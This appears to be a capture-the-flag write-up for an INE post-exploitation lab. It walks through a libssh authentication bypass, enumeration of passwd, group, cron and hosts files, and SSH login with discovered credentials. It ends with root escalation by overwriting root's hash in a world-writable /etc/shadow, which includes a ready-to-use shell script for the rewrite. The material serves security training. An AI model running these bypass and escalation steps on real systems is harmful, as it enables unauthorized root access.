# CTF 1 - Post-Exploitation

***

### Question 1

> The file that stores user account details is worth a closer look. (target1.ine.local)

An Nmap scan of the target shows port 22 open and running `libssh`, for which Metasploit ships an authentication-bypass module (`auxiliary/scanner/ssh/libssh_auth_bypass`). When using it, set the usual options (`RHOSTS` and so on) and also set `SPAWN_PTY` to `true`, so that the session you get back is a usable interactive shell.

The flag is in the account details, so dump them with `cat /etc/passwd`.

### Question 2

> User groups might reveal more than you expect.

To enumerate the groups and their members, run `cat /etc/group`.

### Question 3

> Scheduled tasks often have telling names. Investigate the Cron jobs to uncover the secret.

To see the scheduled jobs, run `ls -al /etc/cron*`, then read the files in the `/etc/cron.d` directory; as the hint says, the job names themselves give the secret away.

### Question 4

> DNS configurations might point you in the right direction. Also, explore the home directories for stored credentials.

To view the DNS configuration, run `cat /etc/resolv.conf` (note the spelling: there is no `e` in `resolv`). There is nothing of value in it, but name resolution also consults the local `/etc/hosts` file, which is the file the hint is pointing at; view it with `cat /etc/hosts`.
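Questions 1 to 4 all come down to reading a handful of files by hand. The script below is an added example, not part of the original write-up, that does the same triage in one pass and pulls out only the entries worth a second look: accounts that can actually log in, any extra UID 0 account, the members of a named group, and the live lines of each cron.d file. The sample `passwd`, `group` and `cron.d` contents are constructed here so it runs offline; on a target you would point the functions at the real `/etc/passwd`, `/etc/group` and `/etc/cron.d`.

```shell
#!/bin/sh
# Added example (not from the original write-up): post-exploitation triage of
# the files Questions 1-4 point at. The sample data further down is constructed.

# Accounts that can actually log in, i.e. whose shell is not nologin/false.
login_accounts() {
    # $1 = passwd-format file
    awk -F: '$7 !~ /(nologin|false)$/ { print $1 " uid=" $3 " home=" $6 " shell=" $7 }' "$1"
}

# Any UID 0 account other than root is a backdoor or a misconfiguration.
extra_uid0() {
    # $1 = passwd-format file
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Members of a named group (field 4 of /etc/group), one per line.
group_members() {
    # $1 = group-format file, $2 = group name
    awk -F: -v g="$2" '$1 == g && $4 != "" { n = split($4, m, ","); for (i = 1; i <= n; i++) print m[i] }' "$1"
}

# Active lines of every file in a cron.d-style directory, prefixed with the
# file name (the "telling names" from the hint), comments and blanks dropped.
cron_entries() {
    # $1 = cron.d-style directory
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        grep -Ev '^[[:space:]]*(#|$)' "$f" | sed "s|^|$(basename "$f"): |"
    done
}

# --- Demonstration on constructed data (not the lab's real files) -----------
d=$(mktemp -d)
cat > "$d/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
john:x:1000:1000:John:/home/john:/bin/bash
backup:x:0:0:backup:/var/backups:/bin/sh
EOF
cat > "$d/group" <<'EOF'
root:x:0:
sudo:x:27:john,backup
docker:x:999:john
EOF
mkdir "$d/cron.d"
printf '# rotate logs\n0 3 * * * root /usr/local/bin/rotate.sh\n' > "$d/cron.d/logrotate"

echo "login accounts:"; login_accounts "$d/passwd"
echo "extra uid 0:";    extra_uid0 "$d/passwd"
echo "sudo members:";   group_members "$d/group" sudo
echo "cron jobs:";      cron_entries "$d/cron.d"
```

On a real box the interesting output is usually a second UID 0 account, a non-service user in `sudo`, `docker` or `adm`, and a cron entry that runs a writable script as root.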

### Question 5

> Use the discovered credentials to gain higher privileges and explore the root's home directory on target2.ine.local.

First, list the contents of `/home/user` to find `credentials.txt`, which holds a username and password for target 2. An Nmap scan of target2.ine.local shows port 22 open with SSH running, so log in with those credentials:

```
ssh john@target2.ine.local
```

Once we are in, we need to enumerate our privileges; we are not root. A quick check for weak file permissions is to list everything that is world-writable:

```
# world-writable files and directories, skipping symlinks; discard "Permission denied" noise
find / -not -type l -perm -o+w 2>/dev/null
```

Among the results is `/etc/shadow`, which is world-writable. Since we can write to it, we can replace root's password hash with one we know and then switch to root. Generate the hash with:

```
openssl passwd -1 -salt abc password123
```

Feel free to use a different password in place of `password123` (`-1` produces an MD5-crypt hash; `-6` gives SHA-512-crypt, which is what modern systems use, and either works with `su`). Copy the generated string and paste it over the asterisk in root's line of `/etc/shadow`, i.e. the second colon-separated field (`*` there means the account is locked). You can do this by opening `/etc/shadow` in nano (a text editor similar to vim). The root line should then look like this:

<figure><img src="https://3152412622-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSLCRGfQP6VPqx00Hm9Ye%2Fuploads%2FFzRpGpCYWVL1BypACzx1%2F%7B6FCB7B4C-8247-40FB-B636-0843E05AF3EE%7D.png?alt=media&#x26;token=5eafc853-e222-4fa7-b488-7d78eb0663ec" alt=""><figcaption></figcaption></figure>

Then run `su`, enter the password you hashed, and you should have a root shell. Navigate to `/root` and list its contents to get the last flag!
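The escalation above (world-writable `/etc/shadow`, overwrite root's hash, `su`) is done here with an editor. As an added example that is not part of the original write-up, the script below does the same thing non-interactively and shows the one detail the editor hides: the file has to be rewritten through its existing inode, because having write permission on `/etc/shadow` does not give you write permission on `/etc`, so `mv`-ing a new file into place would fail. The shadow file and the directory it sits in are constructed sample data; the functions take the file path as a parameter so they can be pointed at the real `/etc/shadow` on a target.

```shell
#!/bin/sh
# Added example (not from the original write-up): escalate through a
# world-writable shadow file by rewriting root's hash field. The shadow file
# below is constructed sample data, not the lab target's real file.

# World-writable regular files under a directory: the check the write-up's
# `find / -not -type l -perm -o+w` does for the whole filesystem.
world_writable_in() {
    find "$1" -type f -perm -o+w 2>/dev/null
}

# Password field (field 2) of one user's line in a shadow-format file.
shadow_field() {
    # $1 = shadow file, $2 = user name
    awk -F: -v u="$2" '$1 == u { print $2 }' "$1"
}

# Replace the password field for a user, leaving the aging fields intact.
# The result is written back through the existing file (cat > file), not
# renamed into place: with o+w on the file but not on its directory, mv fails.
set_shadow_hash() {
    # $1 = shadow file, $2 = user name, $3 = new crypt(3) hash
    tmp="$1.tmp.$$"
    awk -F: -v u="$2" -v h="$3" 'BEGIN { OFS = ":" } $1 == u { $2 = h } { print }' "$1" > "$tmp" \
        && cat "$tmp" > "$1" && rm -f "$tmp"
}

# --- Demonstration on constructed data -------------------------------------
demo_dir=$(mktemp -d)
demo_shadow="$demo_dir/shadow"
# Constructed shadow file: root is locked ("*"), john has a placeholder hash.
cat > "$demo_shadow" <<'EOF'
root:*:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
john:$6$saltsalt$placeholderhash:19000:0:99999:7:::
EOF
chmod 666 "$demo_shadow"   # reproduce the misconfiguration: world-writable

# Same hash the write-up generates (MD5-crypt of "password123"); openssl is
# only invoked when present, otherwise a constructed stand-in string is used.
if command -v openssl >/dev/null 2>&1; then
    new_hash=$(openssl passwd -1 -salt abc password123)
else
    new_hash='$1$abc$constructedstandinhash'   # constructed placeholder
fi

echo "world-writable files under $demo_dir:"
world_writable_in "$demo_dir"
set_shadow_hash "$demo_shadow" root "$new_hash"
echo "root password field is now: $(shadow_field "$demo_shadow" root)"
# On the real target this is the point where `su` with password123 gives root.
```

Two practical checks before trusting this on a target: confirm the hash field you are overwriting really is root's (the first field of the line), and keep a copy of the original line so you can restore it afterwards.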
